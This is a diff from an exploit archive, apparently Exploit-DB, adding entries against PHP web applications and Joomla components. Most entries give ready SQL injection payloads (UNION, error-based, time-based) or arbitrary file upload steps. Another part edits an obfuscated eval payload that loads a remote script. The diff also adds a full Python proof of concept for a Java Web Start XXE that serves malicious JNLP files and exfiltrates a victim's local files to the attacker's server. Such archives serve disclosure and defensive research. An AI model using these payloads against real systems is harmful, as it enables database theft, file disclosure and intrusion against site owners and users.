http://localhost/[PATH]/friends/index/11' RLIKE (SELECT (CASE WHEN (2135=2135) THEN 11 ELSE 0x28 END))-- SVFb +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/friends/index/11' AND (SELECT 1564 FROM(SELECT COUNT(*),CONCAT(0x7170786a71,(SELECT (ELT(1564=1564,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- DoZE +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: http://localhost/[PATH]/friends/index/11' OR SLEEP(5)-- Maum +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: http://localhost/[PATH]/users/profile/1' AND 3612=3612 AND 'wNwI'='wNwI +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/users/profile/1' AND (SELECT 3555 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(3555=3555,1))),0x717a7a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XrEj'='XrEj +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: http://localhost/[PATH]/users/profile/1' AND SLEEP(5) AND 'XZVf'='XZVf +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: http://localhost/[PATH]/users/profile/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767671,0x7a7a646e536849756f717771546e4547497549465459754f65636946535375667577596755616876,0x717a7a7a71)-- UaUA +# +# Parameter: #1* (URI) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: http://localhost/[PATH]/video_catalog/category/1' AND 4550=4550 AND 'SAmI'='SAmI +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/video_catalog/category/1' AND (SELECT 4089 FROM(SELECT COUNT(*),CONCAT(0x716a6a7171,(SELECT (ELT(4089=4089,1))),0x716b786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PTze'='PTze +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: http://localhost/[PATH]/video_catalog/category/1' AND SLEEP(5) AND 'ptLy'='ptLy +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 3 columns +# Payload: http://localhost/[PATH]/video_catalog/category/1' UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a7171,0x4c5a694b4948566c59527663484b7a466c76725746684863506159646973414749617966634d5145,0x716b786a71)-- zDQK +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43091.txt b/platforms/php/webapps/43091.txt new file mode 100755 index 000000000..474e5bb11 --- /dev/null +++ b/platforms/php/webapps/43091.txt @@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: MyBuilder Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.contractorscripts.com/ +# Software Link: http://order.contractorscripts.com/ +# Demo: http://demo.contractorscripts.com/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15968 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/phpsqlsearch_genxml.php?subcategory=[SQL] +# +# 1'++aND(/*!09999sELeCT*/+0x30783331+/*!09999FrOM*/+(/*!09999SeLeCT*/+cOUNT(*),/*!09999CoNCaT*/((sELEcT(sELECT+/*!09999CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''=' +# +# Parameter: subcategory (GET) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: subcategory=1' RLIKE (SELECT (CASE WHEN (9811=9811) THEN 1 ELSE 0x28 END))-- gzxz +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: subcategory=1' AND (SELECT 1213 FROM(SELECT COUNT(*),CONCAT(0x7162626a71,(SELECT (ELT(1213=1213,1))),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qHTp +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: subcategory=1' OR SLEEP(5)-- RvzR +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43092.txt b/platforms/php/webapps/43092.txt new file mode 100755 index 000000000..076592bde --- /dev/null +++ b/platforms/php/webapps/43092.txt @@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Mailing List Manager Pro 3.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.vote-pro.com/ +# Software Link: http://www.mailing-manager.com/demo.html +# Demo: http://www.mailing-manager.com/demo-gold/ +# Version: 3.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15967 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/admin/users/?sort=login&edit=[SQL] +# +# -2'++/*!03333UNION*/(/*!03333SELECT*/0x283129,0x283229,0x283329,/*!03333CONCAT_WS*/(0x203a20,USER()),0x283529,/*!03333CONCAT_WS*/(0x203a20,DATABASE()),/*!03333CONCAT_WS*/(0x203a20,VERSION()),0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429)--+- +# +# http://localhost/[PATH]/admin/template/?edit=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43093.txt b/platforms/php/webapps/43093.txt new file mode 100755 index 000000000..774f8ec6a --- /dev/null +++ b/platforms/php/webapps/43093.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Joomla! Component Zh YandexMap 6.1.1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://zhuk.cc/ +# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/zh-yandexmap/ +# Demo: http://joomla.zhuk.cc/index.php +# Version: 6.1.1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15966 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=[SQL] +# +# Parameter: placemarklistid (GET) +# Type: boolean-based blind +# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) +# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-8164) OR 5013=5013# +# +# Type: error-based +# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) +# Payload: option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-1660) OR 1 GROUP BY CONCAT(0x71627a7871,(SELECT (CASE WHEN (6691=6691) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)# +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43094.txt b/platforms/php/webapps/43094.txt new file mode 100755 index 000000000..898e40ea9 --- /dev/null +++ b/platforms/php/webapps/43094.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Joomla! Component NS Download Shop 2.2.6 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: https://nswd.co/ +# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/paid-downloads/ns-downloadshop/ +# Demo: https://ds.nswd.co/ +# Version: 2.2.6 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15965 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?option=com_ns_downloadshop&task=invoice.create&id=[SQL] +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: MySQL >= 5.0 boolean-based blind - Parameter replace +# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT (CASE WHEN (5078=5078) THEN 5078 ELSE 5078*(SELECT 5078 FROM INFORMATION_SCHEMA.PLUGINS) END)) +# +# Type: error-based +# Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR) +# Payload: option=com_ns_downloadshop&task=invoice.create&id=(SELECT 2458 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2458=2458,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43095.txt b/platforms/php/webapps/43095.txt new file mode 100755 index 000000000..5dbf9c370 --- /dev/null +++ b/platforms/php/webapps/43095.txt @@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Job Board Script - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.nicephpscripts.com/ +# Software http://www.nicephpscripts.com/job_board_script.htm +# Demo: http://www.nicephpscripts.com/scripts/faqscript/ +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15964 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?nice_theme=[SQL] +# +# Parameter: nice_theme (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: nice_theme=2 AND 9686=9686 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: nice_theme=2 AND SLEEP(5) +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43096.txt b/platforms/php/webapps/43096.txt new file mode 100755 index 000000000..ab6aa12c2 --- /dev/null +++ b/platforms/php/webapps/43096.txt @@ -0,0 +1,40 @@ +# # # # # +# Exploit Title: iTech Gigs Script 1.21 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://itechscripts.com/ +# Software Link: http://itechscripts.com/the-gigs-script/ +# Demo: http://gigs.itechscripts.com/ +# Version: 1.21 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15963 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/browse-scategory.php?sc=[SQL] +# +# -12c4ca4238a0b923820dcc509a6f75849b'++/*!08888UNIoN*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,(/*!08888SElEct*/+Export_sEt(5,@:=0,(/*!08888sElEct*/+count(*)/*!08888from*/(information_schEma.columns)whErE@:=Export_sEt(5,Export_sEt(5,@,/*!08888tablE_namE*/,0x3c6c693E,2),/*!08888column_namE*/,0xa3a,2)),@,2)),0x283829,0x283929,0x28313029)--+- +# +# http://localhost/[PATH]/service-provider.php?ser=[SQL] +# +# -9553'++/*!50000UNION*/+/*!50000SELECT*/+1,2,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# Parameter: sc (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: sc=12c4ca4238a0b923820dcc509a6f75849b' AND 5747=5747 AND 'tzJH'='tzJH +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 10 columns +# Payload: sc=-5921' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x74624c4f7167546e4676635467647269456244634147776d584b77796e4870674661646a7a44485a,0x717a6a7a71),NULL,NULL,NULL-- bjaB +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43097.txt b/platforms/php/webapps/43097.txt new file mode 100755 index 000000000..c6c57154f --- /dev/null +++ b/platforms/php/webapps/43097.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: iStock Management System 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://ikodes.com/ +# Software Link: https://codecanyon.net/item/istock-management-system/20405084 +# Demo: http://project.ikodes.com/basicims/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15962 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users upload arbitrary file.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/user/profile +# http://localhost/[PATH]//assets/images/[FILE] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43098.txt b/platforms/php/webapps/43098.txt new file mode 100755 index 000000000..9c70ed50b --- /dev/null +++ b/platforms/php/webapps/43098.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: iProject Management System 1.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://ikodes.com/ +# Software Link: https://codecanyon.net/item/iproject-management-system/20483358 +# Demo: http://project.ikodes.com/ikpms/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15961 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an users to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?cmd=agent&mod=true&ID=[SQL] +# http://localhost/[PATH]/index.php?cmd=client_master&mod=true&ID=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43099.txt b/platforms/php/webapps/43099.txt new file mode 100755 index 000000000..bb46bf0ed --- /dev/null +++ b/platforms/php/webapps/43099.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: Article Directory Script 3.0 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.yourarticlesdirectory.com/ +# Software Link: http://www.yourarticlesdirectory.com/ +# Demo: http://www.yourarticlesdirectory.com/livedemo.php +# Version: 3.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15960 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/category.php?id=[SQL] +# +# 18++/*!02222UniOn*/+(/*!02222SeleCt*/+0x283129,/*!02222CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,0x283429,0x3078323833353239)--+- +# +# http://localhost/[PATH]/author.php?id=[SQL] +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: id=18 AND 8646=8646 +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: id=18 AND SLEEP(5) +# +# Parameter: id (GET) +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: id=27 AND SLEEP(5) +# +# Etc.. +# # # # # diff --git a/platforms/php/webapps/43100.txt b/platforms/php/webapps/43100.txt new file mode 100755 index 000000000..abc2879ee --- /dev/null +++ b/platforms/php/webapps/43100.txt @@ -0,0 +1,32 @@ +# # # # # +# Exploit Title: Adult Script Pro 2.2.4 - SQL Injection +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://www.adultscriptpro.com/ +# Software Link: http://www.adultscriptpro.com/order.html +# Demo: http://www.adultscriptpro.com/demo.html +# Version: 2.2.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15959 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/download/[SQL] +# +# VerAyari+aNd(SELeCT+1+FroM(SeLECT+CoUNT(*),CoNCat((SeLECT+(SELECT+CoNCat(CaST(VERSIoN()+aS+ChaR),0x7e,0x496873616E53656e63616e))+FroM+INFoRMaTIoN_SChEMa.TaBLES+LIMIT+0,1),FLooR(RaNd(0)*2))x+FroM+INFoRMaTIoN_SChEMa.TaBLES+GRoUP+BY+x)a) +# +# Parameter: #1* (URI) +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: http://localhost/[PATH]/download/Verayari AND (SELECT 4247 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(4247=4247,1))),0x717a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/43101.txt b/platforms/php/webapps/43101.txt new file mode 100755 index 000000000..0504d53af --- /dev/null +++ b/platforms/php/webapps/43101.txt @@ -0,0 +1,29 @@ + +
+ + + + + +
diff --git a/platforms/php/webapps/43102.txt b/platforms/php/webapps/43102.txt new file mode 100755 index 000000000..4bc47379a --- /dev/null +++ b/platforms/php/webapps/43102.txt @@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Ingenious School Management System 2.3.0 - Arbitrary File Upload +# Dork: N/A +# Date: 30.10.2017 +# Vendor Homepage: http://iloveprograming.com/ +# Software Link: https://www.codester.com/items/4945/ingenious-school-management-system +# Demo: http://iloveprograming.com/view/login.php +# Version: N/A +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-15957 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# +# The vulnerability allows an student,teacher upload arbitrary file.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/my_profile.php +# http://localhost/[PATH]/uploads/[FILE] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/windows/remote/6880.html b/platforms/windows/remote/6880.html index 600eb0535..f59725193 100755 --- a/platforms/windows/remote/6880.html +++ b/platforms/windows/remote/6880.html @@ -104,7 +104,7 @@ function x() {


-<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'> + diff --git a/platforms/xml/webapps/43103.py b/platforms/xml/webapps/43103.py new file mode 100755 index 000000000..97c1fab98 --- /dev/null +++ b/platforms/xml/webapps/43103.py @@ -0,0 +1,158 @@ +#!/usr/local/bin/python +""" +Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability +Affected: <= v8u131 +File: jre-8u131-windows-i586-iftw.exe +SHA1: 85f0de19845deef89cc5a29edebe5bb33023062d +Download: http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html +References: SRC-2017-0028 / CVE-2017-10309 +Advisory: http://srcincite.io/advisories/src-2017-0028/ + +Vulnerability Details: +====================== + +Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'. +This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack to be leveraged to disclose files, cause a denial of service or trigger SSRF. + +Notes: +====== + +- It will take a few seconds to fire. +- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all. + +Example: +======== + +saturn:~ mr_me$ ./poc.py + + Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability + mr_me 2017 + +(+) usage: ./poc.py +(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt' + +saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt' + + Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability + mr_me 2017 + +(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8 +(+) starting xxe server... +(+) have someone with Java SE installed visit: http://172.16.175.1:9090/ +(!) firing webstart... +(!) downloading jnlp... +(!) downloading si.xml... +(+) stolen: Please%20refer%20to%20http://java.com/licensereadme +^C(+) shutting down the web server +saturn:~ mr_me$ +""" + +import sys +import socket +import fcntl +import struct +from random import choice +from string import lowercase +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler + +try: + import netifaces as ni +except: + print "(-) try 'pip install netifaces'" + sys.exit(1) + +class xxe(BaseHTTPRequestHandler): + + # stfu + def log_message(self, format, *args): + return + + def do_GET(self): + + if "leaked" in self.path: + print "(+) stolen: %s" % self.path.split("?")[1] + self.send_response(200) + self.end_headers() + + elif self.path == "/": + print "(!) firing webstart..." + self.send_response(200) + self.end_headers() + message = """ + + + + + + """ % (ip, path) + self.wfile.write(message) + self.wfile.write('\n') + + elif "si.xml" in self.path: + print "(!) downloading si.xml..." + self.send_response(200) + self.end_headers() + message = """ + + "> + """ % (file, ip) + self.wfile.write(message) + self.wfile.write('\n') + + elif path in self.path: + print "(!) downloading jnlp..." + self.send_response(200) + self.end_headers() + message = """ + + + + %%sp; + %%param1; + %%exfil; + ]> + """ % ip + self.wfile.write(message) + self.wfile.write('\n') + return + +def banner(): + return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n""" + +if __name__ == '__main__': + + print banner() + + if len(sys.argv) != 2: + print "(+) usage: %s " % sys.argv[0] + print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0] + sys.exit(1) + + file = sys.argv[1] + + # randomize incase we change payloads and browser caches + path = "".join(choice(lowercase) for i in range(10)) + path += ".jnlp" + + # interfaces + ints = "" + for i in ni.interfaces(): ints += "%s, " % i + interface = raw_input("(+) select your interface: %s: " % ints[:-2]) + + # get the ip from the interface + try: + ip = ni.ifaddresses(interface)[2][0]['addr'] + except: + print "(-) no ip address associated with that interface!" + sys.exit(1) + print "jnlp://%s:9090/%s" % (ip, path) + try: + server = HTTPServer(('0.0.0.0', 9090), xxe) + print '(+) starting xxe server...' + print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip + server.serve_forever() + + except KeyboardInterrupt: + print '(+) shutting down the web server' + server.socket.close() \ No newline at end of file